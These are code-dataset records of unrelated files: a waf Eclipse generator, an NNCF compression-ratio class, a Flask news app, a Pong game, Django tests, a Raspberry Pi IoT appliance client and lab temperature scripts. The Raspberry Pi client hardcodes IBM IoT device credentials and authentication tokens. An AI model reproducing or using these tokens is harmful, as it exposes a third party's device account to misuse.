\"id\": cconf_id,\n \"name\": \"Default\",\n \"parent\": cdt_bld + \".prefbase.cfg\",\n },\n )\n folderInfo = self.add(\n doc,\n config,\n \"folderInfo\",\n {\"id\": cconf_id + \".\", \"name\": \"/\", \"resourcePath\": \"\"},\n )\n\n toolChain = self.add(\n doc,\n folderInfo,\n \"toolChain\",\n {\n \"id\": cdt_bld + \".prefbase.toolchain.1\",\n \"name\": \"No ToolChain\",\n \"resourceTypeBasedDiscovery\": \"false\",\n \"superClass\": cdt_bld + \".prefbase.toolchain\",\n },\n )\n\n self.add(\n doc,\n toolChain,\n \"targetPlatform\",\n {\n \"binaryParser\": \"org.eclipse.cdt.core.ELF\",\n \"id\": cdt_bld + \".prefbase.toolchain.1\",\n \"name\": \"\",\n },\n )\n\n waf_build = f'\"{waf_executable}\" {eclipse.fun}'\n waf_clean = '\"%s\" clean' % (waf_executable)\n self.add(\n doc,\n toolChain,\n \"builder\",\n {\n \"autoBuildTarget\": waf_build,\n \"command\": executable,\n \"enableAutoBuild\": \"false\",\n \"cleanBuildTarget\": waf_clean,\n \"enableIncrementalBuild\": \"true\",\n \"id\": cdt_bld + \".settings.default.builder.1\",\n \"incrementalBuildTarget\": waf_build,\n \"managedBuildOn\": \"false\",\n \"name\": \"Gnu Make Builder\",\n \"superClass\": cdt_bld + \".settings.default.builder\",\n },\n )\n\n tool_index = 1\n for tool_name in (\"Assembly\", \"GNU C++\", \"GNU C\"):\n tool = self.add(\n doc,\n toolChain,\n \"tool\",\n {\n \"id\": cdt_bld + \".settings.holder.\" + str(tool_index),\n \"name\": tool_name,\n \"superClass\": cdt_bld + \".settings.holder\",\n },\n )\n if cpppath or workspace_includes:\n incpaths = cdt_bld + \".settings.holder.incpaths\"\n option = self.add(\n doc,\n tool,\n \"option\",\n {\n \"id\": incpaths + \".\" + str(tool_index),\n \"name\": \"Include Paths\",\n \"superClass\": incpaths,\n \"valueType\": \"includePath\",\n },\n )\n for i in workspace_includes:\n self.add(\n doc,\n option,\n \"listOptionValue\",\n {\n \"builtIn\": \"false\",\n \"value\": f'\"${{workspace_loc:/{appname}/{i}}}\"',\n },\n )\n for i in cpppath:\n self.add(\n doc,\n option,\n \"listOptionValue\",\n {\"builtIn\": \"false\", \"value\": '\"%s\"' % (i)},\n )\n if tool_name == \"GNU C++\" or tool_name == \"GNU C\":\n self.add(\n doc,\n tool,\n \"inputType\",\n {\n \"id\": \"org.eclipse.cdt.build.core.settings.holder.inType.\"\n + str(tool_index),\n \"languageId\": \"org.eclipse.cdt.core.gcc\"\n if tool_name == \"GNU C\"\n else \"org.eclipse.cdt.core.g++\",\n \"languageName\": tool_name,\n \"sourceContentType\": \"org.eclipse.cdt.core.cSource,org.eclipse.cdt.core.cHeader\",\n \"superClass\": \"org.eclipse.cdt.build.core.settings.holder.inType\",\n },\n )\n tool_index += 1\n\n if source_dirs:\n sourceEntries = self.add(doc, config, \"sourceEntries\")\n for i in source_dirs:\n self.add(\n doc,\n sourceEntries,\n \"entry\",\n {\n \"excluding\": i,\n \"flags\": \"VALUE_WORKSPACE_PATH|RESOLVED\",\n \"kind\": \"sourcePath\",\n \"name\": \"\",\n },\n )\n self.add(\n doc,\n sourceEntries,\n \"entry\",\n {\n \"flags\": \"VALUE_WORKSPACE_PATH|RESOLVED\",\n \"kind\": \"sourcePath\",\n \"name\": i,\n },\n )\n\n storageModule = self.add(\n doc, cconf, \"storageModule\", {\"moduleId\": cdt_mk + \".buildtargets\"}\n )\n buildTargets = self.add(doc, storageModule, \"buildTargets\")\n\n def addTargetWrap(name, runAll):\n return self.addTarget(\n doc,\n buildTargets,\n executable,\n name,\n f'\"{waf_executable}\" {name}',\n runAll,\n )\n\n addTargetWrap(\"configure\", True)\n addTargetWrap(\"dist\", False)\n addTargetWrap(\"install\", False)\n addTargetWrap(\"check\", False)\n\n storageModule = self.add(\n doc,\n cproject,\n \"storageModule\",\n {\"moduleId\": \"cdtBuildSystem\", \"version\": \"4.0.0\"},\n )\n\n self.add(\n doc,\n storageModule,\n \"project\",\n {\"id\": \"%s.null.1\" % appname, \"name\": appname},\n )\n\n doc.appendChild(cproject)\n return doc\n\n def impl_create_pydevproject(self, system_path, user_path):\n # create a pydevproject file\n doc = Document()\n doc.appendChild(\n doc.createProcessingInstruction(\"eclipse-pydev\", 'version=\"1.0\"')\n )\n pydevproject = doc.createElement(\"pydev_project\")\n prop = self.add(\n doc,\n pydevproject,\n \"pydev_property\",\n \"python %d.%d\" % (sys.version_info[0], sys.version_info[1]),\n )\n prop.setAttribute(\"name\", \"org.python.pydev.PYTHON_PROJECT_VERSION\")\n prop = self.add(doc, pydevproject, \"pydev_property\", \"Default\")\n prop.setAttribute(\"name\", \"org.python.pydev.PYTHON_PROJECT_INTERPRETER\")\n # add waf's paths\n wafadmin = [p for p in system_path if p.find(\"wafadmin\") != -1]\n if wafadmin:\n prop = self.add(\n doc,\n pydevproject,\n \"pydev_pathproperty\",\n {\"name\": \"org.python.pydev.PROJECT_EXTERNAL_SOURCE_PATH\"},\n )\n for i in wafadmin:\n self.add(doc, prop, \"path\", i)\n if user_path:\n prop = self.add(\n doc,\n pydevproject,\n \"pydev_pathproperty\",\n {\"name\": \"org.python.pydev.PROJECT_SOURCE_PATH\"},\n )\n for i in user_path:\n self.add(doc, prop, \"path\", \"/${PROJECT_DIR_NAME}/\" + i)\n\n doc.appendChild(pydevproject)\n return doc\n\n def impl_create_javaproject(self, javasrcpath, javalibpath):\n # create a .classpath file for java usage\n doc = Document()\n javaproject = doc.createElement(\"classpath\")\n if javasrcpath:\n for i in javasrcpath:\n self.add(doc, javaproject, \"classpathentry\", {\"kind\": \"src\", \"path\": i})\n\n if javalibpath:\n for i in javalibpath:\n self.add(doc, javaproject, \"classpathentry\", {\"kind\": \"lib\", \"path\": i})\n\n self.add(\n doc,\n javaproject,\n \"classpathentry\",\n {\"kind\": \"con\", \"path\": \"org.eclipse.jdt.launching.JRE_CONTAINER\"},\n )\n self.add(\n doc,\n javaproject,\n \"classpathentry\",\n {\"kind\": \"output\", \"path\": self.bldnode.name},\n )\n doc.appendChild(javaproject)\n return doc\n\n def addDictionary(self, doc, parent, k, v):\n dictionary = self.add(doc, parent, \"dictionary\")\n self.add(doc, dictionary, \"key\", k)\n self.add(doc, dictionary, \"value\", v)\n return dictionary\n\n def addTarget(\n self, doc, buildTargets, executable, name, buildTarget, runAllBuilders=True\n ):\n target = self.add(\n doc,\n buildTargets,\n \"target\",\n {\"name\": name, \"path\": \"\", \"targetID\": oe_cdt + \".build.MakeTargetBuilder\"},\n )\n self.add(doc, target, \"buildCommand\", executable)\n self.add(doc, target, \"buildArguments\", None)\n self.add(doc, target, \"buildTarget\", buildTarget)\n self.add(doc, target, \"stopOnError\", \"true\")\n self.add(doc, target, \"useDefaultCommand\", \"false\")\n self.add(doc, target, \"runAllBuilders\", str(runAllBuilders).lower())\n\n def add(self, doc, parent, tag, value=None):\n el = doc.createElement(tag)\n if value:\n if type(value) == type(\"\"):\n el.appendChild(doc.createTextNode(value))\n elif type(value) == type(dict()):\n self.setAttributes(el, value)\n parent.appendChild(el)\n return el\n\n def setAttributes(self, node, attrs):\n for k, v in attrs.items():\n node.setAttribute(k, v)\n","sub_path":"docs/.mywaflib/waflib/extras/eclipse.py","file_name":"eclipse.py","file_ext":"py","file_size_in_byte":23253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"370459328","text":"\"\"\"\n Copyright (c) 2020 Intel Corporation\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\nfrom typing import Dict\nfrom typing import List\n\nfrom nncf.nncf_network import NNCFNetwork\nfrom nncf.quantization.layers import BaseQuantizer\nfrom nncf.quantization.layers import QUANTIZATION_MODULES\nfrom nncf.quantization.precision_constraints import HardwareQuantizationConstraints\nfrom nncf.quantization.precision_init.base_init import WeightQuantizersHandler\nfrom nncf.quantization.quantizer_id import QuantizerId\nfrom nncf.utils import get_all_modules_by_type\n\n\nclass CompressionRatioCalculator:\n \"\"\"\n Calculates compression ratio - ratio between bits complexity of fully INT8 model and mixed-precision lower-bit one.\n Bit complexity of the model is a sum of bit complexities for each quantized layer, which are a multiplication of\n FLOPS for the layer by number of bits for its quantization. The compression ratio can be used for estimation of\n performance boost for quantized model.\n \"\"\"\n DEFAULT_NUMBER_OF_BITS = 8\n\n def __init__(self, model: NNCFNetwork, quantizers_handler: WeightQuantizersHandler):\n flops_per_module_scope = model.get_flops_per_module()\n\n self._weight_quantizers_in_exec_order = quantizers_handler.get_weight_quantizers_in_execution_order_per_id()\n\n self.flops_per_weight_quantizer_id = {}\n quantization_types = [class_type.__name__ for class_type in QUANTIZATION_MODULES.registry_dict.values()]\n all_quantizers_in_model = get_all_modules_by_type(model.get_nncf_wrapped_model(), quantization_types)\n\n for scope in all_quantizers_in_model:\n if quantizers_handler.is_wq_scope(scope):\n quantizer_id = quantizers_handler.get_quantizer_id_by_scope(scope)\n affected_module_scope = quantizers_handler.get_owning_module_scope_from_wq_scope(scope)\n self.flops_per_weight_quantizer_id[quantizer_id] = flops_per_module_scope[affected_module_scope]\n\n self.maximum_bits_complexity = sum(self.flops_per_weight_quantizer_id.values()) * self.DEFAULT_NUMBER_OF_BITS\n\n def compression_ratio_for_bitwitdh_sequence(self, execution_order_bitwidth_sequence: List[int],\n skipped: Dict[QuantizerId, BaseQuantizer] = None) -> float:\n \"\"\"\n Calculates compression ratio for a given bitwidth sequence\n\n Args:\n execution_order_bitwidth_sequence: list of bitwidths for each weight quantization in the order of execution\n skipped: quantizers that were skipped from bitwidth initialization, since their bitwidth is determined\n unambiguously based on constraints of the HW config\n\n Returns:\n compression ratio of mixed-precision model by relation to fully INT8\n \"\"\"\n bits_complexity = 0\n for wq_num_bits, (wq_id, wq) in zip(execution_order_bitwidth_sequence,\n self._weight_quantizers_in_exec_order.items()):\n bits_complexity += wq_num_bits * self.flops_per_weight_quantizer_id[wq_id]\n if skipped:\n for wq_id, wq in skipped.items():\n bits_complexity += wq.num_bits * self.flops_per_weight_quantizer_id[wq_id]\n\n return self.maximum_bits_complexity / bits_complexity\n\n def ratio_limits(self, bitwidths: List[int], constraints: HardwareQuantizationConstraints = None,\n skipped: Dict[QuantizerId, BaseQuantizer] = None) -> (float, float):\n \"\"\"\n Calculates minimum and maximum compression ratio.\n\n Args:\n bitwidths: list of all available bitwidth for weight quantization\n constraints: precision constraints defined by HW config\n skipped: quantizers that were skipped from bitwidth initialization, since their bitwidth is determined\n unambiguously based on constraints of the HW config\n\n Returns:\n minimum and maximum compression ratio\n \"\"\"\n sequence_len = len(self._weight_quantizers_in_exec_order)\n min_bitwidth_sequence = [min(bitwidths)] * sequence_len\n max_bitwidth_sequence = [max(bitwidths)] * sequence_len\n if constraints:\n for i, quantizer_id in enumerate(self._weight_quantizers_in_exec_order):\n bit_constraints = constraints.get(quantizer_id)\n if bit_constraints:\n min_bitwidth_sequence[i] = min(bit_constraints)\n max_bitwidth_sequence[i] = max(bit_constraints)\n\n max_ratio = self.compression_ratio_for_bitwitdh_sequence(min_bitwidth_sequence, skipped)\n min_ratio = self.compression_ratio_for_bitwitdh_sequence(max_bitwidth_sequence, skipped)\n return min_ratio, max_ratio\n","sub_path":"nncf/quantization/precision_init/compression_ratio.py","file_name":"compression_ratio.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"21694086","text":"#!/usr/bin/env python\nfrom flask import Flask, url_for, redirect,render_template, request\nimport os, sys, datetime\nbasepath = os.getcwd()\nsys.path.append(basepath)\nsys.path.append(basepath+os.path.sep+\"libs\")\nsys.path.append(basepath+os.path.sep+\"restagents\")\nsys.path.append(basepath+os.path.sep+\"rssagents\")\nfrom config_helper import *\nfrom rest import *\nfrom rss import *\nimport hackernews, nprnews, nytimes, washpost\nimport buzzfeed, marketplace\nfrom werkzeug.debug import get_current_traceback\napp = Flask(__name__)\n\ncache_keywords = []\n@app.route('/', methods=['POST','GET'])\ndef main_page():\n error = None\n if request.method=='POST':\n item= request.form\n return rerouting(item)\n return render_template('index.html',greeting=get_greeting())\n\ndef get_greeting():\n n = datetime.datetime.now()\n retval = \"Hello, there!\"\n if n.hour > 16:\n retval = \"Good evening!\"\n elif n.hour > 13:\n retval = \"Good afternoon!\"\n elif n.hour > 7:\n retval = \"Good morning!\"\n return retval\n\ndef rerouting(item):\n if \"marketplace\" in item:\n return redirect(url_for('.show_entries',source='marketplace'))\n elif \"hackernews\" in item:\n return redirect(url_for('.show_entries',source='hackernews'))\n elif \"buzzfeed\" in item:\n return redirect(url_for('.data_input',source=item.keys()[0]))\n elif \"about\" in item:\n return redirect(url_for('.about_page'))\n elif \"nytimes\" in item:\n return redirect(url_for('.data_nytimes'))\n else:\n return redirect(url_for('.data_input',source=item.keys()[0]))\n\n@app.route('/about', methods=['POST','GET'])\ndef about_page():\n if request.method=='POST':\n return redirect(url_for('.main_page'))\n return render_template('about_nellie.html')\n\n@app.route('/buzzfeed/data', methods=['POST','GET'])\ndef bzfd_input():\n global cache_keywords\n static_text = \"Select one or more categories\"\n if request.method=='POST':\n if \"about\" in request.form:\n return redirect(url_for('.about_page'))\n cache_keywords = request.form.keys()\n return redirect(url_for('.show_entries',source=\"buzzfeed\"))\n return render_template('get_buzzfeed.html',static_text=static_text, greeting=get_greeting())\n\n@app.route('/nytimes/data',methods=['POST','GET'])\ndef data_nytimes():\n global cache_keywords\n static_text = \"Would you like to search for something or just get today's top stories?\"\n if request.method=='POST':\n if \"about\" in request.form: \n return redirect(url_for('.about_page'))\n if \"headlines\" in request.form:\n cache_keywords = [\"headlines\"]\n else:\n cache_keywords = [item.strip() for item in request.form['data'].split(',')]\n return redirect(url_for('.show_entries',source=\"nytimes\"))\n return render_template('get_nytimes.html',static_text=static_text, greeting=get_greeting())\n\n@app.route('//data', methods=['POST','GET'])\ndef data_input(source):\n global cache_keywords\n static_text=\"What would you like to know about?\"\n if source == \"hackernews\":\n static_text=\"Enter number of stories:\"\n if request.method=='POST':\n if \"about\" in request.form:\n return redirect(url_for('.about_page'))\n if source==\"nytimes\" and \"headlines\" in request.form:\n cache_keywords = [\"headlines\"]\n else:\n cache_keywords = [item.strip() for item in request.form['data'].split(',')]\n return redirect(url_for('.show_entries',source=source))\n return render_template('get_optional_data.html',static_text=static_text, greeting=get_greeting())\n\n@app.route('/news/', methods=['GET','POST'])\ndef show_entries(source):\n if request.method=='POST':\n if request.form['home']=='Return to main page':\n return redirect(url_for('.main_page'))\n global cache_keywords\n if source=='marketplace':\n stories = getattr(sys.modules[source], \"get_stories\")()\n elif source=='hackernews':\n stories = getattr(sys.modules[source], \"get_stories\")(15)\n else:\n stories = {}\n for word in cache_keywords:\n stories.update(getattr(sys.modules[source], \"get_stories\")(str(word)))\n try:\n if stories == {}:\n return render_template('show_entries.html',entries=None)\n return render_template('show_entries.html', entries=stories)\n except:\n track = get_current_traceback(skip=1,show_hidden_frames=True,\n ignore_system_exceptions=False)\n track.log()\n\n@app.errorhandler(Exception)\ndef exception_handler(error):\n track = get_current_traceback(skip=1,show_hidden_frames=True,\n ignore_system_exceptions=False)\n track.log()\n return \"!!!!\" + repr(error)\n\nif __name__==\"__main__\":\n app.run()\n","sub_path":"flask/nellie_bot.py","file_name":"nellie_bot.py","file_ext":"py","file_size_in_byte":4802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"461223446","text":"# Implementation of classic arcade game Pong\n\nimport simplegui\nimport random\n\n# initialize globals - pos and vel encode vertical info for paddles\nWIDTH = 600\nHEIGHT = 400 \nBALL_RADIUS = 20\nPAD_WIDTH = 10\nPAD_HEIGHT = 80\nHALF_PAD_WIDTH = PAD_WIDTH / 2\nHALF_PAD_HEIGHT = PAD_HEIGHT / 2\nLEFT = False\nRIGHT = True\nball_pos = [WIDTH / 2, HEIGHT / 2]\nvel = [-120/240, -60/180]\npaddle1_pos = [4,20,4,80]\npaddle1_vel = [0,0]\npaddle2_pos = [596,20,596,80]\nball_vel = [-120/240, -60/180]\nscore1 = 0\nscore2 = 0\ndef spawn_ball():\n global ball_pos, ball_vel # these are vectors stored as lists\n ball_pos = [WIDTH / 2, HEIGHT / 2]\n ball_vel[0] = - ball_vel[1]\n \n\n# define event handlers\ndef new_game():\n global paddle1_pos, paddle2_pos, paddle1_vel, paddle2_vel, ball_pos # these are numbers\n global score1, score2 # these are ints\n #spawn_ball(LEFT)\n\n \ndef draw(canvas):\n global score1, score2, paddle1_pos, paddle2_pos, ball_pos, ball_vel, direction \n global LEFT,RIGHT\n # draw mid line and gutters\n canvas.draw_line([WIDTH / 2, 0],[WIDTH / 2, HEIGHT], 1, \"White\")\n canvas.draw_line([PAD_WIDTH, 0],[PAD_WIDTH, HEIGHT], 1, \"White\")\n canvas.draw_line([WIDTH - PAD_WIDTH, 0],[WIDTH - PAD_WIDTH, HEIGHT], 1, \"White\")\n canvas.draw_text(str(score1), [250,112], 48, \"White\") \n canvas.draw_text(str(score2), [325,112], 48, \"White\") \n # update ball\n ball_pos[0] += ball_vel[0]*3\n ball_pos[1] += ball_vel[1]*3\n \n \n # draw ball\n canvas.draw_circle(ball_pos, BALL_RADIUS, 1, \"Red\", \"White\")\n # update paddle's vertical position, keep paddle on the screen\n \n \n #if ball_pos[0] <= paddle1_pos[3]:\n #ball_vel[0] = - ball_vel[0]\n \n \n if ball_pos[0] <= 10:\n ball_vel[0] = - ball_vel[0]\n score1 = score1+1\n spawn_ball()\n \n elif ball_pos[0] >= 572:\n ball_vel[0] = - ball_vel[0]\n score2 = score2+1\n spawn_ball()\n \n elif ball_pos[1]>= 380:\n ball_vel[1] = - ball_vel[1]\n elif ball_pos[1]<= 20:\n ball_vel[1] = - ball_vel[1] \n \n # draw paddles \n canvas.draw_polygon([[paddle1_pos[0],paddle1_pos[1]],[paddle1_pos[2],paddle1_pos[3]]], 10, 'White')\n canvas.draw_polygon([[paddle2_pos[0],paddle2_pos[1]],[paddle2_pos[2],paddle2_pos[3]]], 10, 'White')\n # determine whether paddle and ball collide \n\n #ball_vel = ball_pos\n \n # draw score\n \ndef keydown(key):\n global paddle1_vel, paddle2_vel, paddle1_pos, paddle2_pos\n \n if key == 83:\n paddle1_pos[1] = paddle1_pos[1] + 20\n paddle1_pos[3] = paddle1_pos[3] + 20\n if key == 87:\n paddle1_pos[3] = paddle1_pos[3] - 20\n paddle1_pos[1] = paddle1_pos[1] - 20\n if key == 40:\n paddle2_pos[1] = paddle2_pos[1] + 20\n paddle2_pos[3] = paddle2_pos[3] + 20\n if key == 38:\n paddle2_pos[1] = paddle2_pos[1] - 20\n paddle2_pos[3] = paddle2_pos[3] - 20\n\n \ndef keyup(key):\n global paddle1_vel, paddle2_vel\n\n\n\n# create frame\nframe = simplegui.create_frame(\"Pong\", WIDTH, HEIGHT)\nframe.set_draw_handler(draw)\nframe.set_keydown_handler(keydown)\nframe.set_keyup_handler(keyup)\n\n\n# start frame\nnew_game()\nframe.start()\n","sub_path":"HomeWork04/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"159025566","text":"from django.test import TestCase\nfrom django.core import mail\n# Create your tests here.\nfrom .forms import CandidatoForm\nfrom .models import Candidato\n\n\nclass CandidatoModelTest(TestCase):\n\n def test_tratamento_e_envio_frontend(self):\n candidato = Candidato(\n email=\"jorge@email.com\",\n nome=\"Jorge\",\n nota_html=10,\n nota_js=10,\n nota_css=10,\n nota_android=6,\n nota_ios=0,\n )\n candidato.tratar_cadastro_e_enviar_email()\n self.assertEqual(len(mail.outbox), 1)\n self.assertEqual(\"Obrigado por se candidatar\", mail.outbox[0].subject)\n self.assertIn(\"Front-end\", mail.outbox[0].body)\n\n def test_tratamento_e_envio_backend_e_frontend(self):\n candidato = Candidato(\n email=\"jorge@email.com\",\n nome=\"Jorge\",\n nota_html=10,\n nota_js=10,\n nota_css=10,\n nota_python=10,\n nota_django=10,\n )\n candidato.tratar_cadastro_e_enviar_email()\n self.assertEqual(len(mail.outbox), 2)\n self.assertIn(\"Front-end\", mail.outbox[0].body)\n self.assertIn(\"Back-end\", mail.outbox[1].body)\n\n def test_tratamento_e_envio_nao_qualificado(self):\n candidato = Candidato(\n email=\"naojorge@email.com\",\n nome=\"Nao Jorge\",\n nota_html=0,\n nota_js=0,\n nota_css=0,\n nota_python=0,\n nota_django=0,\n nota_android=0,\n nota_ios=0,\n )\n candidato.tratar_cadastro_e_enviar_email()\n self.assertEqual(len(mail.outbox), 1)\n self.assertNotIn(\"Front-end\", mail.outbox[0].body)\n self.assertNotIn(\"Back-end\", mail.outbox[0].body)\n self.assertNotIn(\"Mobile\", mail.outbox[0].body)\n\n\nclass FormularioViewTest(TestCase):\n\n def test_responder_formulario_envia_email(self):\n self.client.post('/formulario/',\n data={'nome': 'Jorge',\n 'email': 'jorge@email.com',\n 'nota_html': '10'})\n self.assertEqual(len(mail.outbox), 1)\n\nclass CandidatoFormTest(TestCase):\n\n def test_init(self):\n CandidatoForm()\n\n def test_valid_com_dados(self):\n form = CandidatoForm({\n 'nome': \"Jorge\",\n 'email': \"jorge@email.com\",\n 'nota_html': 7,\n 'nota_css': 5,\n 'nota_js': 3,\n 'nota_python': 10,\n 'nota_django': 10,\n 'nota_ios': 1,\n 'nota_android': 8,\n })\n self.assertTrue(form.is_valid())\n\n def test_valid_custom_clean(self):\n form = CandidatoForm({\n 'nome': \"Jorge\",\n 'email': \"jorge@email.com\"\n })\n self.assertFalse(form.is_valid())\n self.assertEqual(form.errors, {\n '__all__': [u'Ao menos uma nota deve ser preenchida'],\n })\n","sub_path":"cadastramento/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"419182720","text":"\nimport time\nimport sys\nimport pprint\nimport uuid\nfrom uuid import getnode as get_mac\n\nimport RPi.GPIO as GPIO\nimport time\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\nGPIO.setup(3,GPIO.OUT) #appliance 1\nGPIO.setup(7,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(11,GPIO.IN) #intruder\nGPIO.setup(13,GPIO.OUT) #appliance 2\nGPIO.setup(15,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nGPIO.setup(29,GPIO.OUT) #appliance 3\nGPIO.setup(31,GPIO.IN,pull_up_down=GPIO.PUD_UP)\nls1='OFF'\nls2='OFF'\nls3='OFF'\n\ntry:\n\timport ibmiotf.application\n\timport ibmiotf.device\nexcept ImportError:\n\t# This part is only required to run the sample from within the samples\n\t# directory when the module itself is not installed.\n\t#\n\t# If you have the module installed, just use \"import ibmiotf.application\" & \"import ibmiotf.device\"\n\timport os\n\timport inspect\n\tcmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],\"../../src\")))\n\tif cmd_subfolder not in sys.path:\n\t\tsys.path.insert(0, cmd_subfolder)\n\timport ibmiotf.application\n\timport ibmiotf.device\n\n\ndef myAppEventCallback(event):\n\tprint(\"Received live data from %s (%s) sent at %s: hello=%s x=%s\" % (event.deviceId, event.deviceType, event.timestamp.strftime(\"%H:%M:%S\"), data['hello'], data['x']))\n\ndef myCommandCallback(cmd):\n print(\"Command received: %s\" % cmd.command)\n if cmd.command == \"ON 1\":\n print(\"Turning Light ON for Appliance 1\")\n GPIO.output(3,1)\n\n elif cmd.command == \"OFF 1\": \n print(\"Turning Light OFF for Appliance 1\")\n GPIO.output(3,0) \n \n elif cmd.command == \"ON 2\":\n print(\"Turning Light ON for Appliacne 2\")\n GPIO.output(13,1)\n\n elif cmd.command == \"OFF 2\":\n print(\"Turning Light OFF for Appliance 2\")\n GPIO.output(13,0)\n\n elif cmd.command == \"ON 3\":\n print(\"Turning Light ON for Appliance 3\")\n GPIO.output(29,1)\n\n elif cmd.command == \"OFF 3\":\n print(\"Turning Light OFF for Appliance 3\")\n GPIO.output(29,0)\n \n#####################################\n#FILL IN THESE DETAILS\n##################################### \n# organization = \"ovil5l\"\n# deviceType = \"raspberry_pi\"\n# deviceId = \"b827eb61ccaa\"\n# appId = str(uuid.uuid4())\n# authMethod = \"token\"\n# authToken = \"V0b3bK7SalG@DsuQS*\"\n\norganization = \"ysoznq\"\ndeviceType = \"raspberry_pi\"\ndeviceId = \"b827eb61ccaa\"\nappId = str(uuid.uuid4())\nauthMethod = \"token\"\nauthToken = \"WrndLEBcQXFY_3o_9z\"\n\n# Initialize the device client.\ntry:\n\tdeviceOptions = {\"org\": organization, \"type\": deviceType, \"id\": deviceId, \"auth-method\": authMethod, \"auth-token\": authToken}\n\tdeviceCli = ibmiotf.device.Client(deviceOptions)\nexcept Exception as e:\n\tprint(str(e))\n\tsys.exit()\n\n# Connect and send a datapoint \"hello\" with value \"world\" into the cloud as an event of type \"greeting\" 10 times\ndeviceCli.connect()\ndeviceCli.commandCallback = myCommandCallback\n#x=0\nwhile(1):\n\tlightStatus1=GPIO.input(7) \n\tlightStatus2=GPIO.input(13)\n\tlightStatus3=GPIO.input(31)\n\tif lightStatus1==0:\n\t\tls1='ON'\n\telse:\n\t\tls1='OFF'\n\tif lightStatus2==0:\n\t\tls2='ON'\n\telse:\t\n\t\tls2='OFF'\n\tif lightStatus3==0:\n\t\tls3='ON'\n\telse:\n\t\tls3=\"OFF\"\n\tdata = {'Light Status 1': ls1, 'Light Status 2': ls2, 'Light Status 3': ls3}\n\tdeviceCli.publishEvent(\"status\",\"json\", data)\n\t#x=x+1\n\ttime.sleep(1)\n\t\t\n\n# Disconnect the device and application from the cloud\ndeviceCli.disconnect()\n#appCli.disconnect()\n\n","sub_path":"Client Configuration on Raspberry Pi/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":3350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262159463","text":"#!/usr/bin/env python3\n#\n# This program controls a TIC500 CryoVac temperature controller. The device \n# is connected to the computer via USB and appears as a COM port.\n# \n\nimport tic500 as t500\nimport time\nfrom datetime import datetime\nimport keyboard # using module keyboard\n\n# Run information\nfilename_prefix = \"cool_down\"\ndata_folder_relative = \"temp_data/cryo_tests\"\n\n# Timestamp for file names\ndateTimeObj = datetime.now()\ntimestamp = dateTimeObj.strftime(\"%d-%b-%Y_%H-%M-%S\")\nprint('Current Timestamp : ', timestamp)\n\n# Write measurements to a file\nf = open(data_folder_relative + \"/\" + filename_prefix + \"_\" \n + timestamp + \".csv\", \"w+\")\n\n# Open the serial device\n# Check this in device manager\n# Also, it should probably be automated\n# It is called PI USB in device manager\ndev = t500.get_dev('COM6')\n\nt500.tic_reset(dev)\nt500.select_channels(dev)\nprint(\"The temperature returned is:\", t500.get_heat_ex(dev) + \"K\")\n\n# Write metadata to file\nf.write(\"=== GENERAL INFORMATION ===\\n\")\nf.write(\"Name: \" + filename_prefix + \"\\n\")\nf.write(\"Date: \" + dateTimeObj.strftime(\"%d %b %Y\") + \"\\n\")\nf.write(\"Time: \" + dateTimeObj.strftime(\"%H:%M:%S\") + \"\\n\\n\")\n\n# Write column headings\nf.write(\"Epoch/s,Valve/V,Temperature/K \\n\")\n\n# Enable output\nt500.output_control(dev, \"ON\")\nt500.set_magprop_volt(dev, 7)\n\nt500.set_limits(dev)\n\n# Write data\nwhile(True):\n \n # Get data\n volt = t500.get_magprop_volt(dev)\n temp = t500.get_heat_ex(dev)\n \n # Write data to file;\n current_epoch = time.time()\n data = str(current_epoch) + \",\"\n data += volt + \",\" + temp\n f.write(data + \"\\n\")\n print(\"Temp:\", temp, \", Magnetic Prop Valve:\", volt)\n time.sleep(1) # 1 second\n if(keyboard.is_pressed('Esc')):\n break # Leave while loop\n\n# Close the file\nf.close()\n\n# Always include this at the end\ndev.close()\n","sub_path":"dies/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"542575288","text":"import numpy as np\n\nsurvival1000 = np.load(\"survival_limits_time1000.npy\")\nn_theta = 30 # Number of scanned angles\nvalues = [0, 1, 4, 16, 64]\ntimes = [1000, 100000, 10000000]\nangles = np.linspace(0., np.pi/2, num = n_theta)\n\nj=0\nfor line in survival1000:\n\tD = 0\n\t#print(line)\n\tfor i in range(0,n_theta-2,2):\n\t\t\t\t\tf1 = (line[ i ]**4)*np.sin(2*angles[i])\n\t\t\t\t\tf2 = (line[i+1]**4)*np.sin(2*angles[i+1])\n\t\t\t\t\tf3 = (line[i+2]**4)*np.sin(2*angles[i+2])\n\t\t\t\t\tD += ((angles[i+2]-angles[i])/6)*(f1 + 4 * f2 + f3)\n\t\t\t\n\tD = D**(1/4)\n\tprint(values[j], D)\n\t#print(np.average(line))\n\tj+=1","sub_path":"integrator.py","file_name":"integrator.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"297530766","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef convergence_test(env, numiters, policy, *args):\n\n cum_reward = np.zeros(numiters)\n 